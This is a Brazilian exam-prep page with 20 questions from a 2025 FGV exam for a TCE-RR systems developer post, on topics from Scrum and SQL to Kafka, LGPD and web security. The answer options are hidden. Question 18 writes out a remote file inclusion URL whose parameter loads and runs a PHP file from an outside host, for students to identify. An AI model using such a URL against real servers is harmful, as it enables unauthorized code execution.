Questões de Concursos Desenvolvedor de Sistemas

Resolva questões de Desenvolvedor de Sistemas comentadas com gabarito, online ou em PDF, revisando rapidamente e fixando o conteúdo de forma prática.

Filtrar questões
💡 Caso não encontre resultados, diminua os filtros.

1Q1030731 | Engenharia de Software, Desenvolvimento de Software, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Acerca dos modelos de desenvolvimento de software, avalie as afirmativas a seguir.

I. O modelo em cascata apresenta o processo de desenvolvimento de software como uma série de etapas simultâneas.
II. No modelo incremental, as fases de especificação, desenvolvimento e validação são intercaladas.
III. O modelo ágil considera que os requisitos e o projeto (design) são desenvolvidos juntos.

Está correto o que se afirma em
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

2Q1030732 | Engenharia de Software, Uml, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

No contexto da análise de requisitos para o desenvolvimento de sistemas, o diagrama UML (Unified Modeling Language) é usado na modelagem de sistemas de software.
Quando se deseja mostrar as interações entre os atores e o sistema e as interações entre seus componentes, deve-se utilizar diagramas de
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

3Q1030733 | Engenharia de Software, Processos de Software, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Em relação à metodologia de gerência de projetos Scrum, analise as afirmativas a seguir.

I. O time de desenvolvimento é responsável por garantir a realização das tarefas do Sprint Backlog.
II. O Product Backlog é gerenciado pelo Product Owner, contendo itens priorizados de acordo com o valor para o cliente.
III. A Definition of Done é um artefato utilizado pelo Scrum Master para controlar a qualidade do trabalho.

Está correto o que se afirma em
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

4Q1030734 | Arquitetura de Software, Sistemas Distribuídos, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Apache Kafka e RabbitMQ são duas tecnologias importantes no contexto de desenvolvimento de aplicações modernas quando se trata de pipeline de dados de streaming e mensageria.
A respeito dessas ferramentas, julgue as seguintes afirmativas:

I. O Kafka emprega um modelo de log particionado, o qual reúne abordagens de fila de mensagens e assinatura de publicação.
II. O RabbitMQ utiliza um protocolo binário via TCP.
III. O Kafka não permite que variados consumidores recebam a mesma mensagem, uma vez que são excluídas após consumo.

Está correto o que se afirma em
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

5Q1030735 | Arquitetura de Software, Arquitetura de Software, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Assinale a opção que representa uma tecnologia com as seguintes características: arquitetura formada por recursos, servidores e clientes, comunicação stateless, armazenamento em cache, uniformidade de interface e código sob demanda.
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

6Q1030736 | Programação, Css Cascading Style Sheets, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

No framework Laravel, há uma ferramenta que é uma implementação mínima e simples de diversos recursos de autenticação, tais como login, cadastro, redefinição de senha e verificação de e-mail. Além disso, a camada de visualização é, por padrão, composta de simples templates Blade estilizados com Tailwind CSS.
O recurso do Laravel descrito acima é o
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

7Q1030737 | Banco de Dados, Modelagem de Dados, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Relacione as etapas de modelagem lógica e física de banco de dados às afirmativas a elas associadas
1. Modelagem Lógica. 2. Modelagem Física.
( ) É dependente do SGBD. ( ) Tem foco maior nas entidades e relacionamentos. ( ) Utiliza tipos de dados genéricos ou abstratos. ( ) Considera itens de desempenho tais como índices, particionamento, etc.
A relação correta, na ordem apresentada, é
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

8Q1030738 | Banco de Dados, Sql, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Assinale a opção que contém apenas comandos da linguagem de criação de dados (DDL – Data Definition Language).
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

9Q1030739 | Banco de Dados, Sgbd, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Alguns Sistemas de Gerenciamento de Bancos de Dados (SGBDs) mais antigos ou especializados não suportam múltiplos valores diretamente no INSERT e requerem abordagens alternativas como loops ou vários comandos separados.
Dos SGBDs listados a seguir, o que suporta múltiplos valores no INSERT desde suas versões iniciais é o
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

10Q1030740 | Governança de TI, Cobit, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

No contexto de Sistemas de Controle Interno em Sistemas de Informação, é fundamental alinhar a implementação de controles automatizados (logs de auditoria, permissões, autenticação entre outros) às normas reconhecidas, como COSO (Committee of Sponsoring Organizations of the Treadway Commission) e COBIT (Control Objectives for Information and Related Technologies), para garantir a eficácia e a conformidade das operações.
Assinale a afirmativa correta acerca da aplicação desses controles segundo as normas mencionadas.
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

11Q1030741 | Banco de Dados, Conceitos Básicos em Banco de Dados, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

No contexto de auditoria e compliance, a pilha ELK Stack (Elasticsearch, Logstash e Kibana) é amplamente usada para analisar e monitorar atividades nos sistemas, especialmente no que se refere à integridade e à segurança de dados.
Sobre as funcionalidades dessa pilha, assinale a afirmativa correta.
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

12Q1030742 | Arquitetura de Software, Sistemas Distribuídos, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

O Zabbix é uma solução open source de monitoramento distribuído. É um software que monitora vários parâmetros de dispositivos de rede e a saúde e integridade de servidores, sistemas e aplicações. A arquitetura Zabbix possui diversos componentes, cada um com uma função específica.
O componente responsável por fazer a coleta de dados sobre disponibilidade e integridade de sistemas de TI em clientes em uma rede remota é o
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

13Q1030743 | Programação, Javascript, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Angular, React e Vue.js são poderosas ferramentas para o desenvolvimento de interfaces de usuários Single Page Applications e sistemas robustos. Elas apresentam, porém, diferentes abordagens.
Diante desse cenário, avalie as afirmativas a seguir e assinale (V) para a verdadeira e (F) para a falsa.

( ) Nuxt é um dos principais frameworks baseados em Angular.
( ) Uma característica do React é o emprego de JSX - extensão de sintaxe que permite escrever marcações semelhantes à HTML em um arquivo JavaScript.
( ) Mantido pelo Google, o Vue.js é baseado em TypeScript e no padrão MVC.


As afirmativas são, respectivamente,
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

14Q1030744 | Programação, Javascript, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

No ecossistema JavaScript existe uma ferramenta que atua como um compilador, permitindo utilizar funcionalidades recentes da linguagem (ex: async/await, classes, arrow functions e JSX), convertendo código ECMAScript 2015+ em uma versão compatível com navegadores mais antigos. Tal ferramenta é denominada
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

15Q1030745 | Segurança da Informação, Ataques e Ameaças, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Analistas do TCE-RR utilizavam uma plataforma web interna para registrar auditorias. Durante a análise de segurança, foi detectado que áreas de entrada de texto na plataforma, usadas para registrar observações em relatórios, continham código malicioso armazenado no servidor.
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

16Q1030746 | Direito Digital, Lei N 13 709 de 2018, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

A Lei Geral de Proteção de Dados (LGPD) estabelece uma série de princípios a ser observados durante o desenvolvimento de sistemas que tratam dados pessoais. Esses princípios têm como objetivo garantir a proteção e a privacidade dos dados, assim como a transparência no seu tratamento.
Nesse sentido, de acordo com os princípios da LGPD aplicados ao desenvolvimento de sistemas, é correto afirmar que
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

17Q1030747 | Segurança da Informação, Criptografia, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

18Q1034433 | Segurança da Informação, Análise de Vulnerabilidade e Gestão de Riscos, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

19Q1034434 | Redes de Computadores, Protocolo, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

O Burp Suite é uma ferramenta amplamente utilizada para testes de segurança em aplicações web, oferecendo funcionalidades como interceptação de tráfego, análise de vulnerabilidades e automação de ataques.
Em relação às ferramentas presentes na ferramenta Burp Suite, analise as afirmativas a seguir.

I. O proxy do Burp Suite pode interceptar o tráfego HTTP e HTTPS entre o cliente e o servidor, permitindo analisar e manipular requisições em tempo real; ele é essencial para identificar vulnerabilidades em parâmetros, cabeçalhos e cookies.

II. O Repeater é uma ferramenta do Burp Suite para realizar ataques automatizados, como brute force e fuzzing, permitindo testar vulnerabilidades em parâmetros de entrada.

III. O Intruder é usado para enviar requisições manualmente, permitindo ajustar parâmetros e repetir testes de vulnerabilidades com base em respostas anteriores; sua interface exibe claramente a requisição enviada e a resposta recebida, facilitando a análise e a validação de falhas.

Está correto o que se afirma em
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️

20Q1034435 | Banco de Dados, Bi Business Intelligence, Desenvolvedor de Sistemas, TCE RR, FGV, 2025

No planejamento e ao controle de projetos, uma prática avançada para garantir o alinhamento entre a execução do projeto e os objetivos estratégicos da organização é
  1. ✂️
  2. ✂️
  3. ✂️
  4. ✂️
  5. ✂️
Utilizamos cookies e tecnologias semelhantes para aprimorar sua experiência de navegação. Política de Privacidade.